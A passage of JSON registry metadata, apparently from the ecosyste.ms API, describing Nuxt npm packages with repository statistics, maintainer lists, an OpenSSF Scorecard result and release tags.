ite-builder-edge","docker_dependents_count":2,"docker_downloads_count":39,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/vite-builder-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/vite-builder-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2025-08-15T18:12:08.306Z","updated_at":"2025-08-15T18:12:08.306Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T15:19:48.659Z","updated_at":"2023-12-13T15:19:48.659Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":12389359,"name":"@nuxt/nitro-server-nightly","ecosystem":"npm","description":"Nitro server integration for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":632,"first_release_published_at":"2025-10-16T07:27:31.114Z","latest_release_published_at":"2025-10-16T07:27:31.114Z","latest_release_number":"0.0.0","last_synced_at":"2026-05-11T14:06:09.860Z","created_at":"2025-10-16T07:27:55.299Z","updated_at":"2026-05-11T14:13:41.968Z","registry_url":"https://www.npmjs.com/package/@nuxt/nitro-server-nightly","install_command":"npm install @nuxt/nitro-server-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"3x":"3.21.5-29640925.9fc42f78","latest":"4.4.6-29641804.af09d0a7","5x":"5.0.0-29641664.68ebb99b"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-05-06T23:06:53.000Z","size":137282,"stargazers_count":60168,"open_issues_count":884,"forks_count":5596,"subscribers_count":775,"default_branch":"main","last_synced_at":"2026-05-07T02:02:57.794Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-05-07T00:28:57.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32755991,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-07T02:14:30.463Z","status":"ssl_error","status_checked_at":"2026-05-07T02:14:29.405Z","response_time":62,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":64,"last_synced_at":"2026-05-03T05:32:00.401Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":118650,"followers":4625,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-05-03T05:32:00.402Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.5","sha":"86f23c4cdac794cf360bac4d15356b56a84fd683","kind":"commit","published_at":"2026-05-10T23:42:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.5/manifests"},{"name":"v4.4.5","sha":"08f34b5d9f263446354459b6227a8ae0d5ff8e9f","kind":"commit","published_at":"2026-05-10T23:42:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.5/manifests"},{"name":"v3.21.4","sha":"20abe11fcab0461633840ad8437be23406e996f7","kind":"commit","published_at":"2026-04-29T23:46:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.4/manifests"},{"name":"v4.4.4","sha":"7f8443d72d1c4bc8703d3ccf60c156d1335fda74","kind":"commit","published_at":"2026-04-29T23:45:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"e177b61526bc8f0d6849bcc20708872cd1743e4f","kind":"commit","published_at":"2026-04-29T23:34:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.3/manifests"},{"name":"v3.21.3","sha":"7fbddddd19a17635d482eaa0361c811735e7baf7","kind":"commit","published_at":"2026-04-29T23:33:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.3/manifests"},{"name":"v4.4.2","sha":"d042505cbd096d68117cc13a9c29cf9c3fcb999b","kind":"commit","published_at":"2026-03-12T11:58:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.4.2/manifests"},{"name":"v4.4.1","sha":"7781701ad15238daef42a89e99f6bc33e738f40b","kind":"commit","published_at":"2026-03-12T11:43:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nux